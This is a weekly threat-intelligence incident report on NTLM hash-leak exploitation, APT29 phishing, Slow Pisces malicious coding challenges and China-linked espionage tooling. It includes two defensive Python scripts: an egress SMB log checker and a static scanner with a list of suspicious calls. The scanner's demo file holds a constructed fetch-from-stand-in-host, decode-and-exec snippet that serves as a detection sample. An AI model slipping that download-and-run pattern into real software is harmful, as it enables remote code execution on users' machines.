Full Report
Can a harmless click really lead to a full-blown cyberattack? Surprisingly, yes — and that’s exactly what we saw in last week’s activity. Hackers are getting better at hiding inside everyday actions: opening a file, running a project, or logging in like normal. No loud alerts. No obvious red flags. Just quiet entry through small gaps — like a misconfigured pipeline, a trusted browser feature,
Analysis Summary
# Incident Report: Weekly Summary of Active Exploitations and Threat Actor Activities
## Executive Summary
This report summarizes several contemporaneous, high-profile cybersecurity events, including the active exploitation of a recently patched Windows NTLM flaw (CVE-2025-24054), sophisticated phishing campaigns targeting European diplomats by APT29, zero-day exploitation on iOS devices, and espionage activities by China-linked groups against Linux systems and developers. The incidents highlight a trend where attackers are exploiting minor misconfigurations, trusted workflows, and delayed patching cycles to achieve initial access and deploy modular, stealthy malware.
## Incident Details
- Discovery Date: Week of April 21, 2025 (Based on article date)
- Incident Date: Varies; CVE-2025-24054 exploitation started March 19, 2025.
- Affected Organization: Multiple entities across various sectors, including diplomatic entities, cryptocurrency developers, and unspecified organizations in Myanmar.
- Sector: Technology, Cryptocurrency, Government/Diplomacy
- Geography: Global (Specific mentions: Ukraine, Colombia, Myanmar, Europe, US-based organizations)
## Timeline of Events
### Initial Access
- **Date/Time:** Exploitation of CVE-2025-24054 began March 19, 2025.
- **Vector:** Hash disclosure spoofing bug (CVE-2025-24054) in Windows NTLM; Sophisticated phishing using wine-tasting lures (APT29); Compromised Python projects shared as coding challenges (Slow Pisces).
- **Details:** Attackers exploited the flaw in Windows NTLM to leak NTLM hashes or user passwords. APT29 utilized malicious ZIP archives delivered via emails with wine-tasting themes. Slow Pisces targeted developers by making them run malicious projects they believed were legitimate coding challenges.
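As an added illustration, not part of the original report: the detection counterpart to the NTLM hash-leak vector above. Whatever the trigger, the hash leaves the network when a Windows host is coerced into authenticating to an attacker-controlled server, typically over SMB, so egress logs are the place to look. The script below assumes a key=value firewall log format (constructed here, adapt the regex to your source) and flags internal hosts that initiate SMB connections to addresses outside RFC 1918 space, including blocked attempts, which are still worth triage.

```python
import ipaddress
import re
from dataclasses import dataclass

# RFC 1918 ranges; any other destination is treated as external for this check.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# SMB ports: a host coerced into opening a remote resource authenticates to it
# with NTLM over these, which is how the hash leaves the network.
SMB_PORTS = {139, 445}

# Constructed log format; replace with the field layout of your own egress logs.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) "
    r"proto=(?P<proto>\w+) action=(?P<action>\w+)$"
)


@dataclass(frozen=True)
class Finding:
    ts: str
    src: str
    dst: str
    dport: int
    action: str


def is_internal(ip: str) -> bool:
    """True if ip falls inside one of the RFC 1918 ranges."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_external_smb(lines, allowlist=frozenset()):
    """Internal hosts reaching SMB ports on non-RFC1918 destinations, allowlist excepted."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # malformed or unrelated line
        dport = int(rec["dport"])
        if dport not in SMB_PORTS:
            continue
        if is_internal(rec["dst"]) or rec["dst"] in allowlist:
            continue  # normal file-server traffic or a known external share
        if not is_internal(rec["src"]):
            continue  # only outbound traffic from our own hosts matters here
        findings.append(Finding(rec["ts"], rec["src"], rec["dst"], dport, rec["action"]))
    return findings


def by_source(findings):
    """Count findings per source host; a host with several hits warrants a look."""
    counts = {}
    for f in findings:
        counts[f.src] = counts.get(f.src, 0) + 1
    return counts


# Constructed sample lines: two clean events, three that should be flagged, one junk line.
SAMPLE_LOG = [
    "2025-04-22T09:01:10Z src=10.0.5.21 dst=10.0.1.7 dport=445 proto=tcp action=allow",
    "2025-04-22T09:02:44Z src=10.0.5.21 dst=203.0.113.45 dport=445 proto=tcp action=allow",
    "2025-04-22T09:03:02Z src=10.0.5.21 dst=198.51.100.7 dport=443 proto=tcp action=allow",
    "2025-04-22T09:05:19Z src=10.0.7.3 dst=198.51.100.7 dport=445 proto=tcp action=deny",
    "garbage line from a rotated file",
    "2025-04-22T09:06:00Z src=10.0.7.3 dst=192.0.2.10 dport=139 proto=tcp action=allow",
]

if __name__ == "__main__":
    hits = find_external_smb(SAMPLE_LOG)
    for h in hits:
        print(f"{h.ts} {h.src} -> {h.dst}:{h.dport} ({h.action})")
    print(by_source(hits))
```

Outbound SMB to the internet is almost never legitimate, so the allowlist should stay short; a denied connection still shows that something on the source host tried to authenticate outward, which is the behaviour to investigate.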
### Lateral Movement
- **Mustang Panda:** Used the custom tool StarProxy.
- **UNC5174:** Employed the stealthy RAT VShell for remote access and likely further internal navigation.
### Data Exfiltration/Impact
- **CVE-2025-24054:** Goal was to leak NTLM hashes or user passwords to infiltrate systems.
- **Slow Pisces:** Deployment of RN Stealer malware aimed at stealing sensitive data from cryptocurrency developers.
- **UNC5174:** Espionage activities and access resale campaigns.
### Detection & Response
- **Detection (CVEs):** The NTLM flaw was actively exploited before Microsoft released a patch last month (April 2025).
- **Detection (iOS):** Apple detected and fixed two actively exploited zero-days (CVE-2025-31200 & CVE-2025-31201) used in "extremely sophisticated" targeted attacks.
- **Response Actions:** Microsoft has patched successive variants of this NTLM flaw (CVE-2024-43451 in Nov 2024, CVE-2025-24054 in April 2025). Apple released fixes for iOS 18.4.1 and related OS versions.
## Attack Methodology
- **Initial Access:** NTLM Hash Disclosure (CVE-2025-24054), Phishing leading to ZIP archive execution (APT29), Execution of compromised code/projects (Slow Pisces), Exploitation of iOS zero-days (Apple attacks).
- **Persistence:** GRAPELOADER (APT29 payload), VShell RAT (UNC5174).
- **Privilege Escalation:** Not explicitly detailed, but implied via NTLM hash leakage.
- **Defense Evasion:** Mustang Panda used a custom driver, SplatCloak, to evade EDR software. UNC5174 uses in-memory malware (VShell).
- **Credential Access:** NTLM hash leakage/spoofing.
- **Discovery:** Mustang Panda deployed custom tools targeting Myanmar.
- **Lateral Movement:** StarProxy (Mustang Panda utility).
- **Collection:** RN Stealer (Slow Pisces).
- **Exfiltration:** Not explicitly detailed, but implied by the nature of stealer malware.
- **Impact:** System infiltration, credential theft, espionage, and deployment of customized toolsets.
## Impact Assessment
- **Financial:** Not quantified, but significant potential costs due to continuous patching cycles and the required investigation for state-sponsored threats.
- **Data Breach:** User credentials (NTLM hashes/passwords); Sensitive data from crypto developers; Intelligence gathering against diplomatic targets.
- **Operational:** Disruption for developers who were tricked into running malicious code; potential disruption to diplomatic communications.
- **Reputational:** High risk for targeted diplomacy and cryptocurrency organizations involved.
## Indicators of Compromise
*Note: Due to the summary nature of the source, specific IOCs are not provided, but patterns are noted.*
- **Network indicators:** Use of new C2 infrastructure by UNC5174 since Jan 2025.
- **File indicators:** RN Loader, RN Stealer, TONESHELL, PAKLOG, CorKLOG, StarProxy, SplatCloak, GRAPELOADER, VShell.
- **Behavioral indicators:** Execution of Python projects requiring runtime compilation; Phishing emails using wine-tasting themes; NTLM hash interaction attempts post-patching cycle.
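As an added example, not part of the original report: a pre-run check for the Slow Pisces vector, where a developer is handed a Python "coding challenge" that quietly fetches, decodes and executes code at runtime. The scanner walks a project's `.py` files with the `ast` module and flags calls that compile or execute runtime-generated code, decode obfuscated blobs, reach the network, or spawn shells; the combination of dynamic execution with decoding or network access is scored high. The demo project and its decode-and-run snippet are constructed stand-ins, not real malware.

```python
import ast
import os
import tempfile

# Call names mapped to the behaviour they indicate. Both the qualified form and the
# bare imported alias are listed so `from base64 import b64decode` is still caught.
SUSPICIOUS_CALLS = {
    "exec": "dynamic-exec", "eval": "dynamic-exec", "compile": "dynamic-exec",
    "builtins.exec": "dynamic-exec", "builtins.eval": "dynamic-exec",
    "marshal.loads": "dynamic-exec",
    "base64.b64decode": "obfuscation", "b64decode": "obfuscation",
    "zlib.decompress": "obfuscation", "codecs.decode": "obfuscation",
    "urllib.request.urlopen": "network", "urlopen": "network",
    "requests.get": "network", "requests.post": "network",
    "socket.create_connection": "network",
    "subprocess.Popen": "shell", "subprocess.run": "shell",
    "subprocess.call": "shell", "os.system": "shell",
}


def _dotted(node):
    """Reconstruct 'a.b.c' from a Name/Attribute chain; None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def scan_source(code, filename="<string>"):
    """Return (filename, lineno, call_name, category) for each suspicious call."""
    try:
        tree = ast.parse(code, filename=filename)
    except SyntaxError as exc:
        # A file that is not valid Python inside a "challenge" is itself notable.
        return [(filename, exc.lineno or 0, "<syntax error>", "unparseable")]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            category = SUSPICIOUS_CALLS.get(name)
            if category:
                findings.append((filename, node.lineno, name, category))
    return sorted(findings)


def scan_project(root):
    """Scan every .py file under root and combine the findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.endswith(".py"):
                path = os.path.join(dirpath, fname)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(fh.read(), path))
    return findings


def risk_score(findings):
    """'high' when code is executed at runtime from decoded or downloaded input."""
    categories = {f[3] for f in findings}
    if "dynamic-exec" in categories and categories & {"obfuscation", "network"}:
        return "high"
    return "medium" if categories else "low"


# Constructed demo files: a benign solution and a helper with the decode-and-run pattern.
BENIGN = "def solve(nums):\n    return sorted(set(nums))\n"
SUSPICIOUS = '''\
import base64
import urllib.request

def warmup():
    # constructed stand-in for the fetch-decode-execute pattern, not real malware
    blob = urllib.request.urlopen("http://example.invalid/update").read()
    exec(base64.b64decode(blob))
'''


def build_demo_project():
    """Write the two demo files into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="challenge_")
    with open(os.path.join(root, "solution.py"), "w", encoding="utf-8") as fh:
        fh.write(BENIGN)
    with open(os.path.join(root, "helpers.py"), "w", encoding="utf-8") as fh:
        fh.write(SUSPICIOUS)
    return root


if __name__ == "__main__":
    results = scan_project(build_demo_project())
    for path, line, name, category in results:
        print(f"{path}:{line}: {name} [{category}]")
    print("risk:", risk_score(results))
```

The scan is deliberately static: it never imports or runs the project, so it is safe to apply before deciding whether to execute unfamiliar code, and a high score is a reason to run it only inside a disposable environment, if at all.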
## Response Actions
- **Containment:** Microsoft released patches for the NTLM flaw (CVE-2025-24054). Apple released urgent OS updates (iOS 18.4.1, etc.).
- **Eradication:** Where a specific campaign is identified, remove TONESHELL, VShell, and related custom binaries from affected systems.
- **Recovery:** Updating/reimaging affected endpoints to the secured versions of operating systems and patches.
## Lessons Learned
- Delays in applying patches after a vulnerability is disclosed translate directly into active exploitation (e.g., the NTLM flaw was exploited from March 19 despite a prior related patch in November 2024).
- Stealthy, legitimate-looking vectors (coding challenges, simple file opening) bypass traditional noisy alerts.
- Threat actors are aggressively evolving their toolsets (e.g., Mustang Panda debuting 5 new tools) specifically to defeat EDR solutions.
## Recommendations
- Prioritize immediate patching for all NTLM-related vulnerabilities (e.g., verify that protections against CVE-2025-24054 and its variants are in place).
- Implement enhanced scrutiny for software executables shared via non-standard channels, especially when targeting high-value individuals like software developers.
- Ensure EDR/AV solutions are current, and routinely test them against evasion techniques that bypass detection layers.
- Review diplomatic communication security protocols following high-profile state-sponsored phishing campaigns.